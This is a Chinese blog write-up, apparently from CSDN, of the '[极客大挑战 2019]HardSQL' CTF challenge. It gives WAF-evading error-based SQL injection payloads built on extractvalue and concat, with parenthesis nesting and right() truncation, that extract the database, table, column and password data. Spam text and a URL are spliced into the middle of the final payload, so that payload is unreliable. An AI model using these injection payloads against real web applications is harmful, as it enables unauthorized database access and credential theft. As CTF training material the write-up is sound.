[极客大挑战 2019]HardSQL

本文详细描述了一次通过Burp Suite进行SQL注入攻击的过程,包括GET型参数的fuzzing,发现WAF的存在,以及如何通过设置请求延迟来避免429错误。作者探讨了单引号引发的错误响应,利用or和#绕过过滤,并采用括号嵌套的方法来规避过滤。通过left和right函数截取信息,逐步揭露数据库信息。此外,还提到了extractvalue和updatexml函数在报错注入中的限制。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

用burp抓包后发现这并不是POST类型,而是在check.php页面的GET型。

对用户名字段和密码字段进行fuzz,检查是否有过滤,发现存在waf。这里用得burp的intruder,不过要设置一定的请求延迟,否则容易返回429。

由于单引号引起了报错(会有报错信息返回),or和#未经过滤,尝试报错注入。空格也会触发waf,于是使用括号进行多层嵌套绕过对括号的过滤。由于返回的字符串长度有限,因此使用left和right函数分别从左右截断获取完整的信息。或仅使用right函数,控制其截取长度的参数不断增大,可以自右至左获取查询结果的全貌。

payload:

爆库名/check.php?username=admin&password=a'or(extractvalue(1,concat(0x7e,database(),0x7e)))%23爆表名/check.php?username=admin&password=a'or(extractvalue(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table_schema)like('geek')),0x7e)))%23爆列名/check.php?username=admin&password=a'or(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e)))%23爆数据/check.php?username=admin&password=a'or(extractvalue(1,concat(0x7e,(select(rig 陕西干部培训 http://sx.ganxun.cn/ ht(password,30))from(geek.H4rDsq1)),0x7e)))%23

后来看到原来是报错函数extractvalue限制每次查询出的字符串长度最大为32,又尝试了updatexml函数,与extractvalue函数一致。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值